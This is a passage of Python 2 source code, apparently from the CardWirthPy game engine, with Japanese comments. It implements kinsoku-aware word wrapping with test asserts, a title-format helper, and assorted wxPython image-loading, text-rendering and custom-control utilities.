# 末尾に行末禁止文字があるので折り返し可能な位置まで遡って折り返す
buf, buflen, word = break_before_openchar(buf, buf, buflen, word)
wordlen = get_width(word)
elif not unicode.isspace(word):
# 空白文字は行末にいくつでも連ねるのでそれ以外の文字を処理
if match_cl((word, is_spchar)):
if width < buflen or (width == buflen and hw < wordlen):
# 行頭禁止文字は1文字まではぶら下げるが、それ以上ある場合は
# 折り返し可能な位置まで遡って折り返す
buf2 = buf
while buf2 and match_cl_last(buf2):
buf2 = buf2[:-1]
if not buf2 or (len(buf2) == 1 and not match_op_last(buf2)):
# 折り返し可能な位置が無かった
lines.append(buf)
buf = []
buflen = 0
elif 2 <= len(buf2) and not match_op_last(buf2[:-1]):
# 折り返し可能な位置が見つかった(折り返した箇所に行末禁止文字が無い)
i = len(buf2)-1
lines.append(buf[:i])
buf = buf[i:]
buflen = sum(map(lambda s: get_width(s[0]), buf))
else:
# 折り返し可能な位置は行末禁止文字だった
buf, buflen, word = break_before_openchar(buf2, buf, buflen, word)
wordlen = get_width(word)
else:
# 普通に折り返す
if buf:
lines.append(buf)
buf = []
buflen = 0
buf, buflen, word = append_word_wrap(buf, buflen, word)
wordlen = get_width(word)
if word:
buf.append((word, is_spchar))
if not is_spchar or word[0] <> '&':
buflen += wordlen
index += len(word)
if buf:
lines.append(buf)
if spcharinfo2 is None:
return u"\n".join(map(lambda buf: u"".join(map(lambda w: w[0], buf)), lines))
else:
seq = []
for i, buf in enumerate(lines):
line = []
seqlen = 0
for word, is_spchar in buf:
if is_spchar:
spcharinfo2.append(resultindex)
line.append(word)
resultindex += len(word)
seq.append(u"".join(line))
if i + 1 < len(lines):
spcharinfo2.append(resultindex) # 折り返し位置を記録
resultindex += len(u"\n")
return u"\n".join(seq)
def wordwrap(s, width, get_width=None, open_chars=u"\"'(<[`{‘“〈《≪「『【〔(<[{「",
close_chars=u"!\"'),.:;>?]`}゜’”′″、。々>》≫」』】〕〟゛°ゝゞヽヾ〻!),.:;>?]}。」、゙゚ぁぃぅぇぉァィゥェォァィゥェォヵっッッゃゅょャュョャュョゎヮㇵㇶㇷㇸㇹㇺ…―ーー",
spcharinfo=None):
if spcharinfo is not None:
spcharinfo2 = []
else:
spcharinfo2 = None
lines = []
index = 0
resultindex = 0
for line in s.splitlines():
wrapped = _wordwrap_impl(line, width, get_width, open_chars, close_chars, index, resultindex, spcharinfo, spcharinfo2)
lines.append(wrapped)
index += len(line)+len(u"\n")
resultindex += len(wrapped)+len(u"\n")
if spcharinfo is not None:
spcharinfo.clear()
spcharinfo.update(spcharinfo2)
return u"\n".join(lines)
assert wordwrap("ABC.DEFG.H,IKLM?", 3) == "ABC.\nDEF-\nG.H,\nIKL-\nM?"
assert wordwrap("[abc..]\ndefg", 3) == "[ab-\nc..]\ndef-\ng"
assert wordwrap("abc..\ndefghij", 3) == "abc.\n.\ndef-\nghi-\nj"
assert wordwrap("a bc..", 4) == "a \nbc.."
assert wordwrap("a bc....],.\ndef", 4) == "a \nbc...\n.],.\ndef"
assert wordwrap("[def]", 4) == "[def]"
assert wordwrap("def[ghi]]", 4) == "def\n[ghi\n]]"
assert wordwrap(u"あいうえお。かきくけこ", 11) == u"あいうえお。\nかきくけこ"
assert wordwrap(u"あいうえAA。かきくけこ", 9) == u"あいうえ\nAA。かき\nくけこ"
assert wordwrap("[[[[a", 4) == "[[[[\na"
assert wordwrap("\"Let's it go!!\"", 4) == "\"Let'\ns it \ngo!!\""
assert wordwrap(u"あいうえおA.かきくけこ", 11) == u"あいうえおA.\nかきくけこ"
assert wordwrap(u"あいうえおA。かきくけこ", 11) == u"あいうえお\nA。かきくけ\nこ"
assert wordwrap(u"pqr pqr PQR", 6) == u"pqr \npqr \nPQR"
def _test_wordwrap(s, width, spcharinfo):
return wordwrap(s, width, spcharinfo=spcharinfo), spcharinfo
assert _test_wordwrap(u"CARD #WIRTH SPECIA&L\nCHA&RACTER #TEST!", 8, spcharinfo=set([5, 18, 24, 32])) ==\
(u"CARD #W\nIRTH \nSPECIA&L\nCHA&RACTER \n#TEST!", set([5, 7, 13, 20, 26, 34, 35]))
assert _test_wordwrap(u"wordwrap", 4, spcharinfo=set()) == \
(u"word-\nwrap", set([5]))
assert wordwrap(u"[&Rabc..]", 3, spcharinfo=set([1])) == u"[&Rab-\nc..]"
assert wordwrap(u"ab...", 3) == u"ab..\n."
assert _test_wordwrap("ab..&R.", 3, spcharinfo=set([4])) == ("ab..\n&R.", set([4, 5]))
def get_char(s, index):
try:
if 0 <= index and index < len(s):
return s[index]
return ""
except:
return ""
def format_title(fmt, d):
"""foobar2000の任意フォーマット文字列のような形式で
文字列の構築を行う。
* %%で囲われた文字列は変数となり、辞書dから得られる値に置換される。
* []で囲われた文字列は、その内側で使用された変数がなければ丸ごと無視される。
* \の次の文字列は常に通常文字となる。
例えば次のようになる:
d = { "application":"CardWirthPy", "skin":"スキン名", "yado":"宿名" }
s = format_title("%application% %skin%[ - %yado%[ %scenario%]]", d)
assert s == "CardWirthPy スキン名 - 宿名"
"""
class _FormatPart(object):
"""フォーマット内の変数。"""
def __init__(self, name):
self.name = name
def eat_parts(fmt, subsection):
"""formatを文字列とFormatPartのリストに分解。
[]で囲われた部分はサブリストとする。
"""
seq = []
bs = False
while fmt:
c = fmt[0]
fmt = fmt[1:]
if bs:
seq.append(c)
bs = False
elif c == "\\":
bs = True
elif c == "]" and subsection:
return fmt, seq
elif c == "%":
ci = fmt.find("%")
if ci <> -1:
seq.append(_FormatPart(fmt[:ci]))
fmt = fmt[ci+1:]
elif c == "[":
fmt, list2 = eat_parts(fmt, True)
seq.append(list2)
else:
seq.append(c)
return fmt, seq
fmt, l = eat_parts(fmt, False)
assert not fmt
def do_format(l):
"""フォーマットを実行する。"""
seq = []
use = False
for sec in l:
if isinstance(sec, _FormatPart):
name = d.get(sec.name, "")
if name:
seq.append(name)
use = True
elif isinstance(sec, list):
text, use2 = do_format(sec)
if use2:
seq.append(text)
use = True
else:
seq.append(sec)
return "".join(seq), use
return do_format(l)[0]
#-------------------------------------------------------------------------------
# wx汎用関数
#-------------------------------------------------------------------------------
def load_wxbmp(name="", mask=False, image=None, maskpos=(0, 0), f=None, retry=True, can_loaded_scaledimage=True,
noscale=False, up_scr=None):
"""pos(0,0)にある色でマスクしたwxBitmapを返す。"""
if sys.platform <> "win32":
assert threading.currentThread() <> cw.cwpy
if not f and (not cw.binary.image.code_to_data(name) and not os.path.isfile(name)) and not image:
return wx.EmptyBitmap(0, 0)
if cw.cwpy and cw.cwpy.rsrc:
name = cw.cwpy.rsrc.get_filepath(name)
if up_scr is None:
up_scr = cw.UP_SCR # ゲーム画面と合わせるため、ダイアログなどでも描画サイズのイメージを使用する
name, up_scr = find_scaledimagepath(name, up_scr, can_loaded_scaledimage, noscale)
ext = ""
haspngalpha = False
bmpdepth = 0
maskcolour = None
isjpg = False
if mask:
if not image:
try:
if f:
data = f.read()
elif cw.binary.image.path_is_code(name):
data = cw.binary.image.code_to_data(name)
else:
if not os.path.isfile(name):
return wx.EmptyBitmap(0, 0)
with open(name, "rb") as f2:
data = f2.read()
f2.close()
if not data:
return wx.EmptyBitmap(0, 0)
ext = get_imageext(data)
if ext == ".png":
haspngalpha = cw.image.has_pngalpha(data)
bmpdepth = cw.image.get_bmpdepth(data)
data, ok1 = cw.image.fix_cwnext32bitbitmap(data)
data, ok2 = cw.image.fix_cwnext16bitbitmap(data)
if isinstance(data, wx.Image):
image = data
elif name and ok1 and ok2 and not cw.binary.image.path_is_code(name):
# BUG: io.BytesIO()を用いてのwx.ImageFromStream()は、
# 二重にファイルを読む処理よりなお10倍も遅い
image = wx.Image(name)
else:
with io.BytesIO(data) as f2:
image = wx.ImageFromStream(f2, wx.BITMAP_TYPE_ANY, -1)
f2.close()
except:
print_ex()
print u"画像が読み込めません(load_wxbmp)", name
return wx.EmptyBitmap(0, 0)
def set_mask(image, maskpos):
maskpos = convert_maskpos(maskpos, image.Width, image.Height)
r = image.GetRed(maskpos[0], maskpos[1])
g = image.GetGreen(maskpos[0], maskpos[1])
b = image.GetBlue(maskpos[0], maskpos[1])
image.SetMaskColour(r, g, b)
return (r, g, b)
if not image.IsOk():
return wx.EmptyBitmap(0, 0)
if not haspngalpha and not image.HasAlpha() and not image.HasMask():
maskcolour = set_mask(image, maskpos)
wxbmp = image.ConvertToBitmap()
# 255色GIFなどでパレットに存在しない色が
# マスク色に設定されている事があるので、
# その場合は通常通り左上の色をマスク色とする
# 将来、もしこの処理の結果問題が起きた場合は
# このif文以降の処理を削除する必要がある
if mask and image.HasMask() and image.CountColours() <= 255:
palette = wxbmp.GetPalette()
if not palette is None:
mask = (image.GetMaskRed(), image.GetMaskGreen(), image.GetMaskBlue())
maskok = False
for pixel in xrange(palette.GetColoursCount()):
if palette.GetRGB(pixel) == mask:
maskok = True
break
if not maskok:
maskcolour = set_mask(image, maskpos)
wxbmp = image.ConvertToBitmap()
elif image:
wxbmp = image.ConvertToBitmap()
else:
try:
wxbmp = wx.Bitmap(name)
except:
print u"画像が読み込めません(load_wxbmp)", name
return wx.EmptyBitmap(0, 0)
if bmpdepth == 1 and mask:
wxbmp.bmpdepthis1 = True
if maskcolour:
wxbmp.maskcolour = maskcolour
wxbmp.scr_scale = up_scr
return wxbmp
def copy_wxbmp(bmp):
"""wx.Bitmapのコピーを生成する。"""
w = bmp.GetWidth()
h = bmp.GetHeight()
return bmp.GetSubBitmap((0, 0, w, h))
def convert_to_image(bmp):
"""wx.Bitmapをwx.Imageに変換する。
FIXME: 直接bmp.ConvertToImage()を使用すると
画像が化ける事がある
"""
w = bmp.GetWidth()
h = bmp.GetHeight()
buf = array.array('B', [0] * (w*h * 3))
bmp.CopyToBuffer(buf)
img = wx.ImageFromBuffer(w, h, buf)
if hasattr(bmp, "bmpdepthis1"):
img.bmpdepthis1 = bmp.bmpdepthis1
if hasattr(bmp, "maskcolour"):
r, g, b = bmp.maskcolour
img.SetMaskColour(r, g, b)
return img
def fill_image(img, surface, csize, ctrlpos=(0, 0), cpos=(0, 0)):
"""引数のsurfaceをimg上に敷き詰める。"""
imgsize = surface.get_size()
w, h = imgsize
startx = -(ctrlpos[0] % w)
starty = -(ctrlpos[1] % h)
x = startx
while x < csize[0]:
y = starty
while y < csize[1]:
img.blit(surface, (x+cpos[0], y+cpos[1]))
y += h
x += w
def fill_bitmap(dc, bmp, csize, ctrlpos=(0, 0), cpos=(0, 0)):
"""引数のbmpを敷き詰める。"""
imgsize = bmp.GetSize()
w, h = imgsize
startx = -(ctrlpos[0] % w)
starty = -(ctrlpos[1] % h)
x = startx
while x < csize[0]:
y = starty
while y < csize[1]:
dc.DrawBitmap(bmp, x+cpos[0], y+cpos[1], False)
y += h
x += w
def get_centerposition(size, targetpos, targetsize=(1, 1)):
"""中央取りのpositionを計算して返す。"""
top, left = targetsize[0] / 2 , targetsize[1] / 2
top, left = targetpos[0] + top, targetpos[1] + left
top, left = top - size[0] / 2, left - size[1] /2
return (top, left)
def draw_center(dc, target, pos, mask=True):
"""指定した座標にBitmap・テキストの中央を合わせて描画。
target: wx.Bitmapかstrかunicode
"""
if isinstance(target, (str, unicode)):
size = dc.GetTextExtent(target)
pos = get_centerposition(size, pos)
dc.DrawText(target, pos[0], pos[1])
elif isinstance(target, wx.Bitmap):
size = target.GetSize()
pos = get_centerposition(size, pos)
dc.DrawBitmap(target, pos[0], pos[1], mask)
def draw_height(dc, target, height, mask=True):
"""高さのみ指定して、横幅は背景の中央に合わせてBitmap・テキストを描画。
target: wx.Bitmapかstrかunicode
"""
if isinstance(target, (str, unicode)):
width = (dc.GetSize()[0] - dc.GetTextExtent(target)[0]) / 2
dc.DrawText(target, width, height)
elif isinstance(target, wx.Bitmap):
width = (dc.GetSize()[0] - target.GetSize()[0]) / 2
dc.DrawBitmap(target, width, height, mask)
def draw_box(dc, pos, size):
"""dcでStaticBoxの囲いを描画する。"""
# ハイライト
colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DHIGHLIGHT)
dc.SetPen(wx.Pen(colour, 1, wx.SOLID))
box = get_boxpointlist((pos[0] + 1, pos[1] + 1), size)
dc.DrawLineList(box)
# 主線
colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DSHADOW)
dc.SetPen(wx.Pen(colour, 1, wx.SOLID))
box = get_boxpointlist(pos, size)
dc.DrawLineList(box)
def draw_witharound_simple(dc, s, x, y, aroundcolor):
"""テキストsを縁取りしながら描画する。"""
oldcolor = dc.GetTextForeground()
dc.SetTextForeground(aroundcolor)
for xx in xrange(x-1, x+2):
for yy in xrange(y-1, y+2):
if xx <> x or yy <> y:
dc.DrawText(s, xx, yy)
dc.SetTextForeground(oldcolor)
dc.DrawText(s, x, y)
def draw_witharound(dc, s, x, y, maxwidth=0):
"""テキストsを縁取りしながら描画する。
フォントのスムージングを行う。
"""
draw_antialiasedtext(dc, s, x, y, False, maxwidth, 0, scaledown=False, bordering=True)
def draw_antialiasedtext(dc, text, x, y, white, maxwidth, padding,
quality=None, scaledown=True, alpha=64,
bordering=False):
if cw.cwpy.setting.bordering_cardname and bordering:
subimg = cw.util.render_antialiasedtext(dc, text, not white, maxwidth, padding,
scaledown=scaledown, quality=quality, alpha=alpha)
for xx in xrange(x-1, x+2):
for yy in xrange(y-1, y+2):
if xx <> x or yy <> y:
dc.DrawBitmap(subimg, xx, yy)
subimg = cw.util.render_antialiasedtext(dc, text, white, maxwidth, padding,
scaledown=scaledown, quality=quality)
dc.DrawBitmap(subimg, x, y)
def render_antialiasedtext(basedc, text, white, maxwidth, padding,
quality=None, scaledown=True, alpha=255):
"""スムージングが施された、背景が透明なテキストを描画して返す。"""
if quality is None:
if 3 <= wx.VERSION[0]:
quality = wx.IMAGE_QUALITY_BICUBIC
else:
quality = wx.IMAGE_QUALITY_NORMAL
w, h = basedc.GetTextExtent(text)
font = basedc.GetFont()
upfont = 0 < maxwidth and maxwidth < w and not scaledown
if upfont:
scaledown = True
basefont = font
pixelsize = font.GetPixelSize()[1]
family = font.GetFamily()
style = font.GetStyle()
weight = font.GetWeight()
underline = font.GetUnderlined()
facename = font.GetFaceName()
encoding = font.GetEncoding()
font = wx.FontFromPixelSize((0, pixelsize*2), family, style, weight, 0, facename, encoding)
basedc.SetFont(font)
w, h = basedc.GetTextExtent(text)
subimg = wx.EmptyBitmap(w, h)
dc = wx.MemoryDC(subimg)
dc.SetFont(font)
dc.SetBrush(wx.BLACK_BRUSH)
dc.SetPen(wx.BLACK_PEN)
dc.DrawRectangle(-1, -1, w + 2, h + 2)
dc.SetTextForeground(wx.WHITE)
dc.DrawText(text, 0, 0)
subimg = subimg.ConvertToImage()
if white:
subimg.ConvertColourToAlpha(255, 255, 255)
else:
subimg.ConvertColourToAlpha(0, 0, 0)
dc.SelectObject(wx.NullBitmap)
if scaledown:
if 0 < maxwidth and w/2 + padding*2 > maxwidth:
size = (maxwidth - padding*2, h/2)
subimg = subimg.Rescale(size[0], h/2, quality=quality)
else:
subimg = subimg.Rescale(w/2, h/2, quality=quality)
else:
if 0 < maxwidth and w + padding*2 > maxwidth:
size = (maxwidth - padding*2, h)
subimg = subimg.Rescale(size[0], h, quality=quality)
if alpha <> 255:
cw.imageretouch.mul_wxalpha(subimg, alpha)
if upfont:
font = wx.FontFromPixelSize((0, pixelsize), family, style, weight, 0, facename, encoding)
basedc.SetFont(font)
subimg = subimg.ConvertToBitmap()
return subimg
def get_boxpointlist(pos, size):
"""StaticBoxの囲い描画用のposlistを返す。"""
x, y = pos
width, height = size
poslist = [][:]
poslist.append((x, y, x + width, y))
poslist.append((x, y, x, y + height))
poslist.append((x + width, y, x + width, y + height))
poslist.append((x, y + height, x + width, y + height))
return poslist
def create_fileselection(parent, target, message, wildcard="*.*", seldir=False, getbasedir=None, callback=None,
winsize=False, multiple=False):
"""ファイルまたはディレクトリを選択する
ダイアログを表示するボタンを生成する。
parent: ボタンの親パネル。
target: 選択結果を格納するコントロール。
message: 選択時に表示されるメッセージ。
wildcard: 選択対象の定義。
seldir: Trueの場合はディレクトリの選択を行う。
getbasedir: 相対パスを扱う場合は基準となるパスを返す関数。
"""
def OnOpen(event):
if target is None:
fpath = ""
else:
fpath = target.GetValue()
dpath = fpath
if getbasedir and not os.path.isabs(dpath):
dpath = os.path.join(getbasedir(), dpath)
if seldir:
dlg = wx.DirDialog(parent.TopLevelParent, message, dpath, wx.DD_DIR_MUST_EXIST)
if dlg.ShowModal() == wx.ID_OK:
dpath = dlg.GetPath()
if getbasedir:
base = getbasedir()
dpath2 = cw.util.relpath(dpath, base)
if not dpath2.startswith(".." + os.path.sep):
dpath = dpath2
if target is not None:
target.SetValue(dpath)
if callback:
callback(dpath)
dlg.Destroy()
else:
dpath = os.path.dirname(fpath)
fpath = os.path.basename(fpath)
flags = wx.FD_OPEN
if multiple:
flags |= wx.FD_MULTIPLE
dlg = wx.FileDialog(parent.TopLevelParent, message, dpath, fpath, wildcard, flags)
if dlg.ShowModal() == wx.ID_OK:
files = dlg.GetFilenames()
seq = []
fnames = ""
for fname in files:
fpath = os.path.join(dlg.GetDirectory(), fname)
if getbasedir:
base = getbasedir()
fpath2 = cw.util.relpath(fpath, base)
if not fpath2.startswith(".." + os.path.sep):
fpath = fpath2
if target is not None:
if fnames != "":
fnames += "; "
fnames += fpath
seq.append(fpath)
if callback:
callback(seq if multiple else seq[0])
if target is not None:
target.SetValue(fnames)
dlg.Destroy()
if winsize:
size = (cw.wins(20), -1)
else:
size = (cw.ppis(20), -1)
button = wx.Button(parent, size=size, label=u"...")
parent.Bind(wx.EVT_BUTTON, OnOpen, button)
return button
def adjust_position(frame):
"""frameの位置がいずれかのモニタ内に収まるように調節する。
サイズ変更は行わない。
"""
win = wx.Display.GetFromWindow(frame)
if win == wx.NOT_FOUND: win = 0
cax, cay, caw, cah = wx.Display(win).GetClientArea()
caw += cax
cah += cay
x, y, w, h = frame.GetRect()
if caw <= x + w: x = caw - w
if cah <= y + h: y = cah - h
if x < cax: x = cax
if y < cay: y = cay
frame.SetPosition((x, y))
class CWPyStaticBitmap(wx.Panel):
"""wx.StaticBitmapはアルファチャンネル付きの画像を
正しく表示できない場合があるので代替する。
複数重ねての表示にも対応。
"""
def __init__(self, parent, cid, bmps, bmps_bmpdepthkey, size=None, infos=None, ss=None):
if not size and bmps:
w = 0
h = 0
for bmp in bmps:
s = bmp.GetSize()
w = max(w, s[0])
h = max(h, s[1])
size = (w, h)
wx.Panel.__init__(self, parent, cid, size=size)
self.bmps = bmps
self.bmps_bmpdepthkey = bmps_bmpdepthkey
self.infos = infos
self.ss = ss
self._bind()
def _bind(self):
self.Bind(wx.EVT_PAINT, self.OnPaint)
def OnPaint(self, event):
dc = wx.PaintDC(self)
for i, (bmp, bmpdepthkey) in enumerate(zip(self.bmps, self.bmps_bmpdepthkey)):
if self.infos:
info = self.infos[i]
w, h = bmpdepthkey.GetSize()
scr_scale = bmpdepthkey.scr_scale if hasattr(bmpdepthkey, "scr_scale") else 1
w /= scr_scale
h /= scr_scale
baserect = info.calc_basecardposition_wx((w, h), noscale=True,
basecardtype="LargeCard",
cardpostype="NotCard")
baserect = self.ss(baserect)
x, y = baserect.x, baserect.y
else:
x, y = 0, 0
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp, x, y, True, bitsizekey=bmpdepthkey)
def SetBitmap(self, bmps, bmps_bmpdepthkey, infos=None):
self.bmps = bmps
self.bmps_bmpdepthkey = bmps_bmpdepthkey
self.infos = infos
self.Refresh()
def GetBitmap(self, bmps):
return self.bmps
def abbr_longstr(dc, text, w):
"""ClientDCを使って長い文字列を省略して末尾に三点リーダを付ける。
dc: ClientDC
text: 編集対象の文字列
w: 目標文字列長(pixel)
"""
if w <= 0 and text:
if dc.GetTextExtent(text)[0] <= dc.GetTextExtent(u"...")[0]:
return text
else:
return u"..."
width = dc.GetTextExtent(text)[0]
if width > w:
while text and dc.GetTextExtent(text + u"...")[0] > w:
text = text[:-1]
text += u"..."
return text
class CheckableListCtrl(wx.ListCtrl,
wx.lib.mixins.listctrl.CheckListCtrlMixin,
wx.lib.mixins.listctrl.ListCtrlAutoWidthMixin):
"""チェックボックス付きのリスト。"""
def __init__(self, parent, cid, size, style, colpos=0, system=True):
wx.ListCtrl.__init__(self, parent, cid, size=size, style=style|wx.LC_NO_HEADER)
wx.lib.mixins.listctrl.CheckListCtrlMixin.__init__(self)
wx.lib.mixins.listctrl.ListCtrlAutoWidthMixin.__init__(self)
for i in xrange(colpos+1):
self.InsertColumn(i, u"")
self.InsertImageStringItem(0, u"", 0)
rect = self.GetItemRect(0, wx.LIST_RECT_LABEL)
self.SetColumnWidth(0, rect.x)
self.DeleteAllItems()
self.resizeLastColumn(0)
self.imglist = self.GetImageList(wx.IMAGE_LIST_SMALL)
assert self.imglist.ImageCount == 2
if not system:
w, h = cw.cwpy.rsrc.debugs_noscale["NOCHECK"].GetSize()
w, h = cw.wins((w, h))
# CheckableListはImageListの0番と1番にチェックボックスの
# 画像を設定してチェックボックスが存在するように見せかけている
# そのため、他のアイコンのサイズがチェックボックス画像に一致しない
# 場合は独自のアイコンに差し替える必要がある
w2, h2 = self.imglist.GetSize(0)
if (w, h) <> (w2, h2):
self.imglist = wx.ImageList(w, h, True)
self.imglist.Add(cw.wins(cw.cwpy.rsrc.debugs_noscale["NOCHECK"]))
self.imglist.Add(cw.wins(cw.cwpy.rsrc.debugs_noscale["CHECK"]))
self.SetImageList(self.imglist, wx.IMAGE_LIST_SMALL)
self._system = system
self._checking = False
self.OnCheckItem = self.DefaultOnCheckItem
def DefaultOnCheckItem(self, index, flag):
# チェック時に音を鳴らし、選択中のアイテムだった場合は
# 他の選択中のアイテムにもチェックを反映
if self._checking:
return
self._checking = True
if not self._system:
cw.cwpy.play_sound("page")
wx.lib.mixins.listctrl.CheckListCtrlMixin.OnCheckItem(self, index, flag)
i = self.GetNextItem(index-1, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index == i:
index = -1
while True:
index = self.GetNextItem(index, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index < 0:
break
if index <> i:
self.CheckItem(index, flag)
self._checking = False
def Draw(self, index, dc, x, y, flags=wx.IMAGELIST_DRAW_NORMAL, solidBackground=False):
print(index, x, y)
wx.lib.mixins.listctrl.CheckListCtrlMixin.Draw(self, index, dc, x, y, flags, solidBackground)
class CWBackCheckBox(wx.CheckBox):
def __init__(self, parent, id, text):
"""CAUTIONリソースを背景とするチェックボックス。"""
wx.CheckBox.__init__(self, parent, id, text)
self.SetBackgroundStyle(wx.BG_STYLE_CUSTOM)
dc = wx.ClientDC(self)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("paneltitle", pixelsize=cw.wins(15)))
w, h = dc.GetTextExtent(text)
bmp = cw.wins(cw.cwpy.rsrc.debugs_noscale["NOCHECK"])
w += cw.wins(4) + bmp.GetWidth()
h = max(h, bmp.GetHeight())
self.SetMinSize((w, h))
self.SetSize((w, h))
self._nocheck = bmp
self._check = cw.wins(cw.cwpy.rsrc.debugs_noscale["CHECK"])
self.background = cw.cwpy.rsrc.dialogs["CAUTION"]
self._bind()
def _bind(self):
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set_background(self, bmp):
self.background = bmp
self.Refresh()
def OnPaint(self, event):
size = self.GetSize()
basebmp = wx.EmptyBitmap(size[0], size[1])
dc = wx.MemoryDC(basebmp)
# background
bmp = self.background
csize = self.GetClientSize()
fill_bitmap(dc, bmp, csize, ctrlpos=self.GetPosition())
# checkbox
if self.GetValue():
bmp = self._check
else:
bmp = self._nocheck
dc.DrawBitmap(bmp, cw.wins(2), (csize[1]-bmp.GetHeight()) / 2, True)
# text
dc.SetTextForeground(wx.BLACK)
s = self.GetLabel()
#TODO;PyLite;「中央寄せ」のデザイン調和
if s == cw.cwpy.msgs["centering_face"]:
dc.SetFont(cw.cwpy.rsrc.get_wxfont("characre", pixelsize=cw.wins(12)))
else:
dc.SetFont(cw.cwpy.rsrc.get_wxfont("paneltitle", pixelsize=cw.wins(15)))
tsize = dc.GetTextExtent(s)
dc.DrawText(s, bmp.GetWidth()+cw.wins(4), (csize[1]-tsize[1]) / 2)
dc.SelectObject(wx.NullBitmap)
dc = wx.PaintDC(self)
dc.DrawBitmap(basebmp, 0, 0)
def add_sideclickhandlers(toppanel, leftbtn, rightbtn):
"""toppanelの左右の領域をクリックすると
leftbtnまたはrightbtnのイベントが実行されるように
イベントへのバインドを行う。
"""
def _is_cursorinleft():
rect = toppanel.GetClientRect()
x, _y = toppanel.ScreenToClient(wx.GetMousePosition())
return x < rect.x + rect.width / 4 and leftbtn.IsEnabled()
def _is_cursorinright():
rect = toppanel.GetClientRect()
x, _y = toppanel.ScreenToClient(wx.GetMousePosition())
return rect.x + rect.width / 4 * 3 < x and rightbtn.IsEnabled()
def _update_mousepos():
if _is_cursorinleft():
toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_BACK"])
elif _is_cursorinright():
toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FORE"])
else:
toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_ARROW"])
def OnMotion(evt):
_update_mousepos()
def OnLeftUp(evt):
if _is_cursorinleft():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, leftbtn.GetId())
leftbtn.ProcessEvent(btnevent)
elif _is_cursorinright():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, rightbtn.GetId())
rightbtn.ProcessEvent(btnevent)
_update_mousepos()
toppanel.Bind(wx.EVT_MOTION, OnMotion)
toppanel.Bind(wx.EVT_LEFT_UP, OnLeftUp)
def set_acceleratortable(panel, seq, ignoreleftrightkeys=(wx.TextCtrl, wx.Dialog, wx.Panel)):
"""panelにseqから生成したAcceleratorTableを設定する。
"""
# テキスト入力欄に限り左右キーとBACKキーを取り除く
seq2 = []
for accel in seq:
if not (accel[0] == wx.ACCEL_NORMAL and accel[1] in ( wx.WXK_LEFT, wx.WXK_RIGHT, wx.WXK_BACK , ord('_'))):
seq2.append(accel)
accel1 = wx.AcceleratorTable(seq)
accel2 = wx.AcceleratorTable(seq2)
def recurse(widget):
if isinstance(widget, ignoreleftrightkeys):
widget.SetAcceleratorTable(accel2)
else:
widget.SetAcceleratorTable(accel1)
for child in widget.GetChildren():
recurse(child)
recurse(panel)
def adjust_dropdownwidth(choice):
"""wx.Choiceまたはwx.ComboBoxのドロップダウンリストの
横幅を内容に合わせて広げる。
"""
if sys.platform == "win32":
# スクロールバーの幅
scwidth = win32api.GetSystemMetrics(win32con.SM_CXVSCROLL)
w = win32api.SendMessage(choice.GetHandle(), win32con.CB_GETDROPPEDWIDTH, 0, 0)
# 項目ごとに幅を計算
dc = wx.ClientDC(choice)
for s in choice.GetItems():
w = max(w, dc.GetTextExtent(s)[0] + cw.ppis(5) + scwidth)
dc.SetFont(choice.GetFont())
# モニタの横幅よりは大きくしない
d = wx.Display.GetFromWindow(choice)
if d == wx.NOT_FOUND: d = 0
drect = wx.Display(d).GetClientArea()
w = min(w, drect[2])
# 幅を設定
win32api.SendMessage(choice.GetHandle(), win32con.CB_SETDROPPEDWIDTH, w, 0)
def has_modalchild(frame):
"""frame.TopLevelParentにモーダル表示中のサブウィンドウがあればTrue。"""
for child in frame.TopLevelParent.GetChildren():
if isinstance(child, wx.Dialog) and child.IsShown() and child.IsModal():
return True
if frame is cw.cwpy.frame and cw.cwpy.frame.debugger and has_modalchild(cw.cwpy.frame.debugger):
return True
return False
class CWPyRichTextCtrl(wx.richtext.RichTextCtrl):
_search_engines = None
def __init__(self, parent, id, text="", size=(-1, -1), style=0, searchmenu=False):
wx.richtext.RichTextCtrl.__init__(self, parent, id, text, size=size, style=style)
# popup menu
self.popup_menu = wx.Menu()
self.mi_copy = wx.MenuItem(self.popup_menu, wx.ID_COPY, u"コピー(&C)")
self.mi_selectall = wx.MenuItem(self.popup_menu, wx.ID_SELECTALL, u"すべて選択(&A)")
self.popup_menu.AppendItem(self.mi_copy)
self.popup_menu.AppendItem(self.mi_selectall)
self.Bind(wx.EVT_TEXT_URL, self.OnURL)
self.Bind(wx.EVT_CONTEXT_MENU, self.OnContextMenu)
self.Bind(wx.EVT_MOUSEWHEEL, self.OnMouseWheel)
self.Bind(wx.EVT_MOTION, self.OnMotion)
self.Bind(wx.EVT_MENU, self.OnCopy, id=wx.ID_COPY)
self.Bind(wx.EVT_MENU, self.OnSelectAll, id=wx.ID_SELECTALL)
self.search_engines = []
if searchmenu:
if os.path.isfile(u"Data/SearchEngines.xml"):
try:
if CWPyRichTextCtrl._search_engines is None:
CWPyRichTextCtrl._search_engines = []
data = cw.data.xml2element(u"Data/SearchEngines.xml")
for e in data:
if e.tag == u"SearchEngine":
url = e.getattr(".", "url", "")
name = e.text
if url and name:
menuid = wx.NewId()
CWPyRichTextCtrl._search_engines.append((url, name, menuid))
class SearchEngine(object):
def __init__(self, parent, url, name, menuid):
self.parent = parent
self.url = url
self.mi = wx.MenuItem(self.parent.popup_menu, menuid, name)
self.parent.popup_menu.AppendItem(self.mi)
self.parent.Bind(wx.EVT_MENU, self.OnSearch, id=menuid)
def OnSearch(self, event):
try:
self.parent.go_url(self.url % self.parent.GetStringSelection())
except:
cw.util.print_ex(file=sys.stderr)
separator = False
for url, name, menuid in CWPyRichTextCtrl._search_engines:
if not separator:
separator = True
self.popup_menu.AppendSeparator()
self.search_engines.append(SearchEngine(self, url, name, menuid))
except:
cw.util.print_ex(file=sys.stderr)
def set_text(self, value, linkurl=False):
# ZIPアーカイブのファイルエンコーディングと
# 読み込むテキストファイルのエンコーディングが異なる場合、
# エラーが出るので
try:
